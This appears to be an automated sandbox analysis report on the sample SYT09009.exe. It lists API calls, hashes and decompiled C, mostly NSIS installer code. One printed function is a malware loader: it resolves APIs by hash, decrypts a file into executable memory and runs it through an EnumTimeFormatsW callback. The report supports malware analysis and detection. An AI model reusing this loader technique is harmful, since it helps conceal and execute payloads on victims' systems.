0x00405901
0x00405905
0x00405918
0x0040591f
0x00405924
0x00405928
0x00405938
0x0040592a
0x00405930
0x00405930
0x0040593d
0x00405940
0x0040594b
0x00405951
0x00405956
0x00405966
0x00405968
0x0040596e
0x00405971
0x00405974
0x00405a2c
0x00405a2c
0x00405a30
0x00405a32
0x00405a32
0x00405a32
0x00405a32
0x00000000
0x00000000
0x00000000
0x00000000
0x0040597a
0x0040597a
0x00405983
0x00405989
0x0040598e
0x00405991
0x00405993
0x00405997
0x00405999
0x00405999
0x00405997
0x0040599c
0x0040599f
0x004059b2
0x004059b4
0x004059b9
0x004059c0
0x004059db
0x004059e0
0x004059e2
0x00405a06
0x004059e4
0x004059e4
0x004059e7
0x004059fb
0x004059e9
0x004059ec
0x004059f4
0x004059f4
0x004059e7
0x004059c2
0x004059c8
0x004059ca
0x004059d0
0x004059d0
0x004059ca
0x00000000
0x004059c0
0x004059a1
0x004059a4
0x004059a6
0x00000000
0x00000000
0x004059a8
0x004059aa
0x00000000
0x00000000
0x004059ac
0x004059b0
0x00000000
0x00000000
0x00000000
0x00405a0b
0x00405a15
0x00405a1b
0x00405a1b
0x00405a26
0x00000000
0x00405a26
0x00405942
0x00405949
0x00000000
0x00000000
0x00000000
0x00405907
0x00405907
0x00405909
0x00405a36
0x00405a38
0x00405a3b
0x00405a8c
0x00405a8c
0x00405a8c
0x00405a3d
0x00405a40
0x00405a4b
0x00405a50
0x00405a52
0x00000000
0x00000000
0x00405a55
0x00405a61
0x00405a66
0x00405a68
0x00000000
0x00405a83
0x00405a6a
0x00405a6d
0x00000000
0x00000000
0x00405a72
0x00000000
0x00405a79
0x00405a42
0x00405a42
0x00000000
0x00405a42
0x0040590f
0x00405912
0x00000000
0x00000000
0x00000000
0x00405912

APIs

DeleteFileA.KERNEL32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
FindClose.KERNEL32(00000000), ref: 00405A26

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
\*.*, xrefs: 0040592A
"C:\Users\user\Desktop\SYT09009.exe" , xrefs: 004058BF

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\SYT09009.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3998005411
Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A

Uniqueness

Uniqueness Score: -1.00%

Function 10001000, Relevance: 6.1, APIs: 4, Instructions: 97
filememorytimeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10001000(void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v536;
				intOrPtr* _t24;
				void* _t33;
				_Unknown_base(*)()* _t34;
				int _t37;
				signed char _t52;
				_Unknown_base(*)()* _t54;

				_v8 = 0;
				_t53 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				_v12 = E10001160( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8a111d91);
				_t24 = E10001160( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0xa4f84a9a);
				_v16 = E10001160(_t53, 0x433a3842);
				E10001160(_t53, 0xa5f15738);
				 *((intOrPtr*)(E10001160(_t53, 0xcbec1a0)))();
				 *_t24( &_v536, 0x10003000, 0x103,  &_v536);
				_t33 = CreateFileW( &_v536, 0x80000000, 7, 0, 3, 0x80, 0);
				_t34 = VirtualAlloc(0, 0x3605, 0x3000, 0x40); // executed
				_t54 = _t34;
				ReadFile(_t33, _t54, 0x3605,  &_v8, 0);
				_t52 = 0;
				if(_v8 > 0) {
					do {
						asm("ror al, 1");
						 *((char*)(_t54 + _t52)) = ( !(((( *((intOrPtr*)(_t54 + _t52)) + _t52 ^ _t52) - _t52 ^ _t52) - _t52 ^ 0x000000ab) - 0x4e) ^ _t52) + 0xe + _t52 - 0x4a;
						_t52 = _t52 + 1;
					} while (_t52 < _v8);
				}
				_t37 = EnumTimeFormatsW(_t54, 0, 0); // executed
				return _t37;
			}

0x1000100c
0x10001026
0x10001039
0x1000103c
0x10001054
0x10001057
0x1000107b
0x10001089
0x100010a4
0x100010b7
0x100010bb
0x100010c8
0x100010cb
0x100010d0
0x100010d2
0x100010eb
0x100010ef
0x100010f2
0x100010f3
0x100010d2
0x100010fd
0x10001109

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100010A4
VirtualAlloc.KERNEL32(00000000,00003605,00003000,00000040), ref: 100010B7
ReadFile.KERNEL32(00000000,00000000,00003605,00000000,00000000), ref: 100010C8
EnumTimeFormatsW.KERNELBASE(00000000,00000000,00000000), ref: 100010FD

Memory Dump Source

Source File: 00000000.00000002.251980600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.251975485.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.251984838.0000000010002000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocCreateEnumFormatsReadTimeVirtual
String ID:
API String ID: 2368423067-0
Opcode ID: 5bb7af9673828cbaf2ba888027952f1a4d3d2c5fde0bcdfc74118857e52f742f
Instruction ID: d6f17a57c60f3d064246800873ef0843c16bc058ca27a15dde8c312196bc1129
Opcode Fuzzy Hash: 5bb7af9673828cbaf2ba888027952f1a4d3d2c5fde0bcdfc74118857e52f742f
Instruction Fuzzy Hash: 0221DB35A40308BBFB11D7748C4AFDBB7BCDF56B90F104099F605EB181D6746A058764

Uniqueness

Uniqueness Score: -1.00%

Function 0040646B, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040646B(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0e0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0e0;
			}

0x00406476
0x0040647f
0x00000000
0x0040648c
0x00406482
0x00000000

APIs

FindFirstFileA.KERNEL32(7519FA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
FindClose.KERNEL32(00000000), ref: 00406482

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC

Uniqueness

Uniqueness Score: -1.00%

Function 00403CA7, Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a878 = _t35;
					if(_t116 == 0x110) {
						 *0x42f428 = _t126;
						 *0x42a88c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429858 = _t92;
						E0040417B(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08); // executed
						 *0x42ebec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a878 = 1;
					}
					_t123 =  *0x40a1dc; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f460;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004041C7(0x40b);
						while(1) {
							_t37 =  *0x42a878;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0xffffffff
							__eflags = _t39 -  *0x42f464;
							if(_t39 ==  *0x42f464) {
								E0040140B(1);
							}
							__eflags =  *0x42ebec - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f464; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E0040417B(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4cc - _t134;
							_v32 = _t49;
							if( *0x42f4cc != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E0040419D(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429858, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4cc - _t134;
							if( *0x42f4cc == _t134) {
								_push( *0x42a88c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429858);
							}
							E004041B0();
							E004060F7(0x42a890, E00403C88());
							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a890);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebf8);
									 *0x42a068 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ebf8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E0040417B(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebec - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ebf8, 8);
									E004041C7(0x405);
									goto L58;
								}
								__eflags =  *0x42f4cc - _t134;
								if( *0x42f4cc != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4c0 - _t134;
								if( *0x42f4c0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebf8);
						 *0x42f428 = _t134;
						EndDialog(_t126,  *0x429c60);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E004041E2(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4cc - _t134;
										if( *0x42f4cc == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c60 = 1;
											L21:
											_push(0x78);
											L22:
											E00404154();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c60 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _a12;
						L58:
						if( *0x42b890 == _t134) {
							_t143 =  *0x42ebf8 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b890 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403cb0
0x00403cb9
0x00403dfa
0x00403dfe
0x00403e02
0x00403e04
0x00403e09
0x00403e14
0x00403e1f
0x00403e24
0x00403e26
0x00403e28
0x00403e2b
0x00403e30
0x00403e3e
0x00403e4b
0x00403e52
0x00403e52
0x00403e53
0x00403e53
0x00403e58
0x00403e5e
0x00403e65
0x00403e6b
0x00403e6d
0x00403ead
0x00403eb2
0x00403eb7
0x00403eb7
0x00403ebc
0x00403ec5
0x00403ec7
0x00403ecc
0x00403ed2
0x00403ed6
0x00403ed6
0x00403edb
0x00403ee1
0x00000000
0x00000000
0x00403eec
0x00403ef2
0x00000000
0x00000000
0x00403efb
0x00403f03
0x00403f08
0x00403f0b
0x00403f11
0x00403f16
0x00403f19
0x00403f1f
0x00403f24
0x00403f27
0x00403f2d
0x00403f35
0x00403f3b
0x00403f41
0x00403f45
0x00403f4c
0x00403f4c
0x00403f4c
0x00403f56
0x00403f68
0x00403f74
0x00403f79
0x00403f83
0x00403f89
0x00403f8b
0x00403f90
0x00403f8d
0x00403f8d
0x00403f8d
0x00403fa0
0x00403fb8
0x00403fba
0x00403fc0
0x00403fd5
0x00403fc2
0x00403fcb
0x00403fcd
0x00403fcd
0x00403fdb
0x00403fec
0x00403ffd
0x00404004
0x0040400a
0x0040400e
0x00404013
0x00404015
0x00000000
0x0040401b
0x0040401b
0x0040401d
0x00000000
0x00000000
0x00404023
0x00404027
0x0040404c
0x00404052
0x00404058
0x0040405a
0x00000000
0x00000000
0x00404080
0x00404086
0x00404088
0x0040408d
0x00000000
0x00000000
0x00404093
0x00404096
0x00404099
0x004040b0
0x004040bc
0x004040d5
0x004040db
0x004040df
0x004040e4
0x004040ea
0x00000000
0x00000000
0x004040f4
0x004040ff
0x00000000
0x004040ff
0x00404029
0x0040402f
0x00000000
0x00000000
0x00404035
0x0040403b
0x00000000
0x00000000
0x00000000
0x00404041
0x00404015
0x0040410c
0x00404118
0x0040411f
0x00000000
0x00403e6f
0x00403e6f
0x00403e72
0x00403ea5
0x00403ea5
0x00403ea7
0x00000000
0x00000000
0x00000000
0x00403ea7
0x00403e74
0x00403e78
0x00403e7d
0x00403e7f
0x00000000
0x00000000
0x00403e8f
0x00403e97
0x00000000
0x00403e9d
0x00403ccb
0x00403ccb
0x00403ccf
0x00403cd4
0x00403ce3
0x00403ce3
0x00403cec
0x00403cf5
0x00403d00
0x00403d00
0x00403d0c
0x00403d28
0x00403d2b
0x00403d3e
0x00403d44
0x00403de7
0x00000000
0x00403df0
0x00403d4a
0x00403d57
0x00403d59
0x00403d5b
0x00403d7a
0x00403d7a
0x00403d7d
0x00403d82
0x00403d85
0x00403d95
0x00403d96
0x00403d98
0x00403dce
0x00403de1
0x00000000
0x00403de1
0x00403d9a
0x00403da0
0x00403db9
0x00403dbe
0x00403dc0
0x00000000
0x00000000
0x00403dc2
0x00403dae
0x00403dae
0x00403db0
0x00403db0
0x00000000
0x00403db0
0x00403da3
0x00403da8
0x00000000
0x00403da8
0x00403d87
0x00403d8d
0x00000000
0x00000000
0x00403d8f
0x00000000
0x00403d8f
0x00403d7f
0x00000000
0x00403d7f
0x00403d65
0x00403d6c
0x00403d72
0x00403d74
0x00000000
0x00000000
0x00000000
0x00403d74
0x00403d30
0x00000000
0x00403d0e
0x00403d14
0x00403d1e
0x00404125
0x0040412b
0x0040412d
0x00404133
0x00404138
0x0040413e
0x0040413e
0x00404133
0x00404148
0x00000000
0x00404148
0x00403d0c

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
ShowWindow.USER32(?), ref: 00403D00
DestroyWindow.USER32 ref: 00403D14
SetWindowLongA.USER32 ref: 00403D30
GetDlgItem.USER32 ref: 00403D51
SendMessageA.USER32 ref: 00403D65
IsWindowEnabled.USER32(00000000), ref: 00403D6C
GetDlgItem.USER32 ref: 00403E1A
GetDlgItem.USER32 ref: 00403E24
KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
SendMessageA.USER32 ref: 00403E8F
GetDlgItem.USER32 ref: 00403F35
ShowWindow.USER32(00000000,?), ref: 00403F56
EnableWindow.USER32(?,?), ref: 00403F68
EnableWindow.USER32(?,?), ref: 00403F83
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
EnableMenuItem.USER32 ref: 00403FA0
SendMessageA.USER32 ref: 00403FB8
SendMessageA.USER32 ref: 00403FCB
lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
SetWindowTextA.USER32(?,0042A890), ref: 00404004
ShowWindow.USER32(?,0000000A), ref: 00404138

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
String ID:
API String ID: 4050669955-0
Opcode ID: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
Opcode Fuzzy Hash: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040390A, Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040390A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f434;
				_t17 = E00406500(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a890;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
					__eflags =  *0x42a890;
					if(__eflags == 0) {
						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406055("1033", _t67 & 0x0000ffff);
				}
				E00403BCF(_t71, _t84);
				_t80 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x42f4c0 =  *0x42f43c & 0x00000020;
				 *0x42f4dc = 0x10000;
				if(E00405B7D(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405B7D(_t92, _t80) == 0) {
						E0040618A(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec08 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403BCF(_t71, __eflags);
							__eflags =  *0x42f4e0;
							if( *0x42f4e0 != 0) {
								_t28 = E004052F0(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a870, 5); // executed
							_t34 = E00406492("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E00406492("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebc0);
								 *0x42ebe4 = _t81;
								RegisterClassA(0x42ebc0);
							}
							_t36 =  *0x42ec00; // 0x0
							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0); // executed
							E0040385A(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f420;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebd4 = _t25;
						 *0x42ebe4 = 0x40a1f4;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3c0;
					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
					_t57 =  *0x42e3c0; // 0x4b
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3c1;
						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E004060F7(_t80, E00405A8F(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405AD6(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403910
0x00403919
0x00403920
0x00403922
0x00403936
0x00403948
0x0040394f
0x00403956
0x0040395c
0x00403961
0x00403967
0x0040397a
0x0040397a
0x00403985
0x00403924
0x00403924
0x0040392f
0x0040392f
0x0040398a
0x00403994
0x0040399d
0x004039a2
0x004039b3
0x00403a3a
0x00403a42
0x00403a4b
0x00403a4b
0x00403a61
0x00403a67
0x00403a75
0x00403af6
0x00403afe
0x00403b08
0x00403b0d
0x00403b13
0x00403b9d
0x00403ba2
0x00403ba4
0x00403bc0
0x00000000
0x00403bc0
0x00403ba6
0x00403bac
0x00403bb4
0x00403bb4
0x00000000
0x00403bac
0x00403b21
0x00403b2c
0x00403b31
0x00403b33
0x00403b3a
0x00403b3a
0x00403b45
0x00403b4d
0x00403b4f
0x00403b51
0x00403b5a
0x00403b5d
0x00403b63
0x00403b63
0x00403b69
0x00403b82
0x00403b93
0x00000000
0x00403b98
0x00403b00
0x00403b02
0x00000000
0x00403a77
0x00403a77
0x00403a83
0x00403a8d
0x00403a93
0x00403a98
0x00403aa7
0x00403bc5
0x00403bc5
0x00000000
0x00403bc5
0x00403ab6
0x00403af1
0x00000000
0x00403af1
0x004039b9
0x004039b9
0x004039bc
0x004039be
0x00000000
0x00000000
0x004039c8
0x004039d8
0x004039dd
0x004039e4
0x00000000
0x00000000
0x004039e8
0x004039ea
0x004039f7
0x004039f7
0x004039ff
0x00403a05
0x00403a2d
0x00403a35
0x00000000
0x00403a17
0x00403a18
0x00403a21
0x00403a27
0x00403a28
